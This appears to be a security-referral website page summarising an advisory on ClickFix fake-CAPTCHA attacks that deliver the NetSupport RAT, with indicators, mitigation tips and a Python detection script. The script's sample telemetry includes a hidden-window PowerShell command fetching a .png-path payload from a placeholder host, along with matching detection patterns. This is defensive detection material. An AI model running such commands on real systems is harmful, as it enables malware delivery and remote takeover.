
Digital safety starts here for both commercial and personal use.

Defend Your Business Against the Latest WNY Cyber Threats. We offer safe, secure and affordable solutions for your business and personal networks and devices.



WNYCyber is there to help you to choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet Programmers who have to deal daily with Cyber Threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS' DATA... We built this Website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do not charge or collect any fees.

Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks

Summary:
Beginning in early January 2025, the eSentire Threat Response Unit observed an increase in the number of incidents involving the NetSupport Remote Access Trojan (RAT). The tool was originally developed in 1989 as a legitimate remote IT support product, NetSupport Manager, but has been weaponized by cybercriminals in recent years. The adversary has remained active leading into early February. NetSupport RAT is malware that grants attackers full control over the victim's host: it lets them monitor the user's screen, control the keyboard and mouse, upload and download files, and launch and execute malicious commands, which makes defending against it a priority. NetSupport can cause severe incidents by facilitating disruptive follow-on activity such as ransomware deployment and the compromise of sensitive data. There is no information regarding how users are directed to the compromised website hidden behind the fake CAPTCHA wall.

The ClickFix technique was used in this campaign in January 2025 to deliver NetSupport RAT. ClickFix is a technique in which threat actors inject a fake CAPTCHA webpage into compromised websites; the page instructs users to follow a series of steps that copy and execute malicious PowerShell commands on their host, which in turn download and run malware payloads. In recently observed incidents, the NetSupport RAT payloads were often hosted on a URL whose path contained ".png". When the victim executes the PowerShell command, it downloads the NetSupport RAT client and its configuration file onto the host to establish C2 connections. The NetSupport RAT C2 gateway URL often contains the string "fakeurl.htm" in its path. In the attack chains identified by eSentire, the PowerShell command downloads and executes the NetSupport RAT client from a remote server that hosts the malicious components disguised as PNG image files.
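The chain above gives a defender three observable pivots: a user-launched PowerShell command, a download whose URL path contains ".png", and a C2 gateway URL containing "fakeurl.htm". The following is an added triage example (not code from eSentire, The Hacker News or WNYCyber) that scores constructed process-creation and web-proxy records against those indicators; the simplified record format, the `explorer.exe` parent-process heuristic (assuming the pasted command is launched from the Windows Run dialog) and the hidden-window check are assumptions, not details from the advisory.

```python
import re

# Constructed sample telemetry (not real IoCs): two process-creation records
# and two web-proxy records in a simplified dict form.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/img/update.png -o c:\\users\\public\\x.zip"'},
    {"type": "process", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"type": "web", "url": "http://example.invalid/fakeurl.htm"},
    {"type": "web", "url": "https://example.invalid/blog/header.png"},
]

# Indicators taken from the advisory: ".png" in the download URL path used by the
# PowerShell stage, and "fakeurl.htm" in the NetSupport C2 gateway URL.
PNG_URL = re.compile(r"https?://[^\s\"']*\.png\b", re.IGNORECASE)
C2_GATEWAY = re.compile(r"fakeurl\.htm", re.IGNORECASE)
# Assumed heuristic: ClickFix commands usually hide the PowerShell window.
HIDDEN_PS = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


def score_event(ev):
    """Return the list of indicator names matched by one telemetry record."""
    hits = []
    if ev["type"] == "process" and ev["image"].lower() == "powershell.exe":
        cmd = ev["cmdline"]
        if ev["parent"].lower() == "explorer.exe":
            # Assumption: a paste into the Run dialog shows up as explorer.exe -> powershell.exe
            hits.append("powershell_from_explorer")
        if HIDDEN_PS.search(cmd):
            hits.append("hidden_window")
        if PNG_URL.search(cmd):
            hits.append("png_path_download")
    elif ev["type"] == "web" and C2_GATEWAY.search(ev["url"]):
        hits.append("netsupport_gateway_url")
    return hits


def triage(events):
    """Map event index -> 'high' or 'medium' for every record with at least one hit.

    A gateway URL hit, or a PowerShell launch from explorer.exe that also fetches a
    .png-path URL, is rated high; any other single indicator is medium.
    """
    verdicts = {}
    for i, ev in enumerate(events):
        hits = set(score_event(ev))
        if not hits:
            continue
        strong = ("netsupport_gateway_url" in hits
                  or {"powershell_from_explorer", "png_path_download"} <= hits)
        verdicts[i] = "high" if strong else "medium"
    return verdicts
```

A plain PNG fetched by a browser (the last sample record) produces no hit, so the ".png" indicator is only applied to PowerShell command lines, where it is meaningful.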

Security Officer Comments:
Because the NetSupport RAT campaign is ongoing, organizations should validate their security controls and educate users on common initial access techniques such as ClickFix. The ClickFix technique was recently used in a campaign distributing the popular Lumma Stealer as well, highlighting how widely it is used to bypass defenses and deliver payloads. That Lumma Stealer is a newer version that uses the ChaCha20 cipher to decrypt a configuration file containing the list of command-and-control (C2) servers. Threat actors, including TA569, have also been observed delivering NetSupport to target organizations via fake browser update campaigns. NetSupport RAT is a sophisticated malware that is difficult to detect and remove. It is important to be aware of the threat posed by NetSupport RAT ClickFix distribution and to take steps to protect your organization's endpoints.

Suggested Corrections:
Here are some tips for mitigating NetSupport RAT delivered via ClickFix distribution:
  • Do not click on links or open attachments from unknown or untrusted sources, as they may be phishing attempts aiming to direct users to one of the compromised fake CAPTCHA sites.
  • Keep your software up to date, including your antivirus and anti-malware software.
  • Employees should be cautious when entering credentials into online forms.
  • Use strong passwords and change them regularly.
  • Segment the network into isolated subnetworks to improve security and manageability.
  • If you think your organization's endpoints have been infected with NetSupport RAT via ClickFix distribution, take immediate action to remove it. Seek out third-party solutions for help.
Link(s):
https://thehackernews.com/2025/02/threat-actors-exploit-clickfix-to.html

https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution